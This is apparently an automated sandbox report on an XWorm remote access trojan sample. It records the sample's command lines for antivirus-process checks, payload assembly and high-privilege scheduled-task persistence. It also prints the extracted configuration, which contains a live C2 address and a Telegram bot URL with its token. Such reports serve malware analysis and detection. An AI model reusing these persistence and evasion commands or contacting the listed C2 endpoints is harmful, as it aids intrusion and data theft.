
Windows Analysis Report
DA92phBHUS.exe

Overview

General Information

Sample name: DA92phBHUS.exe (renamed because original name is a hash value)
Original sample name: 649673218a19e8fd278c99d1355949f4.exe
Analysis ID: 1544503
MD5: 649673218a19e8fd278c99d1355949f4
SHA1: da2b13b98dbb3ba3973388866860cb7cb3d2b59e
SHA256: 7a2c1437ed5ff19adf078f17881fc836a4b08d3eaaff243d5ca77577f5880169
Tags: 32exe

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: WScript or CScript Dropper
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (suppress errors)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • DA92phBHUS.exe (PID: 888 cmdline: "C:\Users\user\Desktop\DA92phBHUS.exe" MD5: 649673218A19E8FD278C99D1355949F4)
    • cmd.exe (PID: 2828 cmdline: "C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 3744 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 2416 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 1720 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5608 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5848 cmdline: cmd /c md 438799 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 6112 cmdline: findstr /V "pantyhoseyourslandscapesdisposition" Flyer MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6940 cmdline: cmd /c copy /b ..\Turn + ..\Tale + ..\Intensity L MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Dump.pif (PID: 5432 cmdline: Dump.pif L MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • cmd.exe (PID: 5328 cmdline: cmd /c schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 1072 cmdline: schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
        • schtasks.exe (PID: 6672 cmdline: schtasks.exe /create /tn "ImageSyncProX" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc onlogon /F /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • RegAsm.exe (PID: 3608 cmdline: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • choice.exe (PID: 5436 cmdline: choice /d y /t 15 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 6668 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • ImageSyncProX.scr (PID: 2688 cmdline: "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr" "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\m" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
{"C2 url": ["193.41.226.233"], "Port": "2222", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
{"C2 url": "https://api.telegram.org/bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage"}
Source | Rule | Description | Author
sslproxydump.pcap | JoeSecurity_XWorm_1 | Yara detected XWorm | Joe Security

Source | Rule | Description | Author
0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0x7ec3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x10b33:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7f60:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x10bd0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8075:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x10ce5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x7b71:$cnc4: POST / HTTP/1.1
  • 0x107e1:$cnc4: POST / HTTP/1.1
0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0000000A.00000003.2672114464.00000000014B2000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0x7ebb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7f58:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x806d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x7b69:$cnc4: POST / HTTP/1.1
00000017.00000002.2972619420.0000000001032000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
(15 further entries not shown)

Source | Rule | Description | Author
23.2.RegAsm.exe.1030000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
23.2.RegAsm.exe.1030000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
23.2.RegAsm.exe.1030000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0x8073:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x8110:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x8225:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x7d21:$cnc4: POST / HTTP/1.1
10.3.Dump.pif.151caa0.1.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
10.3.Dump.pif.151caa0.1.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Strings:
  • 0x6273:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x6310:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x6425:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x5f21:$cnc4: POST / HTTP/1.1
(8 further entries not shown)

System Summary

Source: Process started; Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems); Data: Command: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe, ParentCommandLine: Dump.pif L, ParentImage: C:\Users\user\AppData\Local\Temp\438799\Dump.pif, ParentProcessId: 5432, ParentProcessName: Dump.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe, ProcessId: 3608, ProcessName: RegAsm.exe
Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: cmd /c schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine: cmd /c schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: Dump.pif L, ParentImage: C:\Users\user\AppData\Local\Temp\438799\Dump.pif, ParentProcessId: 5432, ParentProcessName: Dump.pif, ProcessCommandLine: cmd /c schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ProcessId: 5328, ProcessName: cmd.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5328, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Cdna" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST, ProcessId: 1072, ProcessName: schtasks.exe
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js", ProcessId: 6668, ProcessName: wscript.exe
Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: Dump.pif L, CommandLine: Dump.pif L, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\438799\Dump.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\438799\Dump.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\438799\Dump.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2828, ParentProcessName: cmd.exe, ProcessCommandLine: Dump.pif L, ProcessId: 5432, ProcessName: Dump.pif
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe, ParentCommandLine: Dump.pif L, ParentImage: C:\Users\user\AppData\Local\Temp\438799\Dump.pif, ParentProcessId: 5432, ParentProcessName: Dump.pif, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\438799\RegAsm.exe, ProcessId: 3608, ProcessName: RegAsm.exe
Source: File created; Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io; Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\438799\Dump.pif, ProcessId: 5432, TargetFilename: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: schtasks.exe /create /tn "ImageSyncProX" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc onlogon /F /RL HIGHEST, CommandLine: schtasks.exe /create /tn "ImageSyncProX" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc onlogon /F /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: Dump.pif L, ParentImage: C:\Users\user\AppData\Local\Temp\438799\Dump.pif, ParentProcessId: 5432, ParentProcessName: Dump.pif, ProcessCommandLine: schtasks.exe /create /tn "ImageSyncProX" /tr "wscript //B 'C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js'" /sc onlogon /F /RL HIGHEST, ProcessId: 6672, ProcessName: schtasks.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\DA92phBHUS.exe", ParentImage: C:\Users\user\Desktop\DA92phBHUS.exe, ParentProcessId: 888, ParentProcessName: DA92phBHUS.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.bat, ProcessId: 2828, ProcessName: cmd.exe
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\438799\Dump.pif, ProcessId: 5432, TargetFilename: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.js", ProcessId: 6668, ProcessName: wscript.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started; Author: Joe Security; Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Highlighted Highlighted.bat & Highlighted.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2828, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 5608, ProcessName: findstr.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-29T14:17:48.652355+0100 | 2853685 | 1 | A Network Trojan was detected | 192.168.2.4 | 64427 | 149.154.167.220 | 443 | TCP
2024-10-29T14:17:59.616383+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 193.41.226.233 | 2222 | 192.168.2.4 | 64431 | TCP
2024-10-29T14:18:10.149694+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 193.41.226.233 | 2222 | 192.168.2.4 | 64431 | TCP
2024-10-29T14:18:13.784635+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 193.41.226.233 | 2222 | 192.168.2.4 | 64431 | TCP
2024-10-29T14:17:59.653552+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 64431 | 193.41.226.233 | 2222 | TCP
2024-10-29T14:18:10.152577+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 64431 | 193.41.226.233 | 2222 | TCP
2024-10-29T14:18:13.785604+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 64431 | 193.41.226.233 | 2222 | TCP
2024-10-29T14:17:59.365704+0100 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 64431 | 193.41.226.233 | 2222 | TCP


AV Detection

Source: 0000000A.00000003.2672114464.00000000014C0000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: Xworm {"C2 url": ["193.41.226.233"], "Port": "2222", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: RegAsm.exe.3608.23.memstrmin; Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7981465575:AAEW4gOQw1_KaLtAHUtM3Ol8vEbq1ghRfE0/sendMessage"}
Source: DA92phBHUS.exe; ReversingLabs: Detection: 18%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 98.4% probability
Source: 23.2.RegAsm.exe.1030000.0.unpack; String decryptor: 193.41.226.233
Source: 23.2.RegAsm.exe.1030000.0.unpack; String decryptor: 2222
Source: 23.2.RegAsm.exe.1030000.0.unpack; String decryptor: <123456789>
Source: 23.2.RegAsm.exe.1030000.0.unpack; String decryptor: <Xwormmm>
Source: 23.2.RegAsm.exe.1030000.0.unpack; String decryptor: XWORM v5.6
Source: 23.2.RegAsm.exe.1030000.0.unpack; String decryptor: USB.exe
Source: DA92phBHUS.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:64427 version: TLS 1.2
Source: DA92phBHUS.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000017.00000000.2618092586.0000000000C52000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe.10.dr
Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000017.00000000.2618092586.0000000000C52000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe.10.dr
Source: C:\Users\user\Desktop\DA92phBHUS.exe; Code function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
Source: C:\Users\user\Desktop\DA92phBHUS.exe; Code function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
Source: C:\Users\user\Desktop\DA92phBHUS.exe; Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif; Code function: 10_2_00EA4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00EA4005
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif; Code function: 10_2_00EA494A GetFileAttributesW,FindFirstFileW,FindClose,10_2_00EA494A
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif; Code function: 10_2_00EA3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,10_2_00EA3CE2
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif; Code function: 10_2_00EAC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_00EAC2FF
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif; Code function: 10_2_00EACD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_00EACD9F
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif; Code function: 10_2_00EACD14 FindFirstFileW,FindClose,10_2_00EACD14
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif; Code function: 10_2_00EAF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00EAF5D8
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif; Code function: 10_2_00EAF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00EAF735
Source: C:\Users\user\AppData\Local\Temp\438799\Dump.pif; Code function: 10_2_00EAFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_00EAFA36
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr; Code function: 18_2_00354005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_00354005
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr; Code function: 18_2_0035C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,18_2_0035C2FF
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr; Code function: 18_2_0035494A GetFileAttributesW,FindFirstFileW,FindClose,18_2_0035494A
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr; Code function: 18_2_0035CD14 FindFirstFileW,FindClose,18_2_0035CD14
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr; Code function: 18_2_0035CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,18_2_0035CD9F
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr; Code function: 18_2_0035F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_0035F5D8
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr; Code function: 18_2_0035F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_0035F735
Source: C:\Users\user\AppData\Local\ImageSyncPro Innovations Co\ImageSyncProX.scr; Code function: 18_2_0035FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,18_2_0035FA36
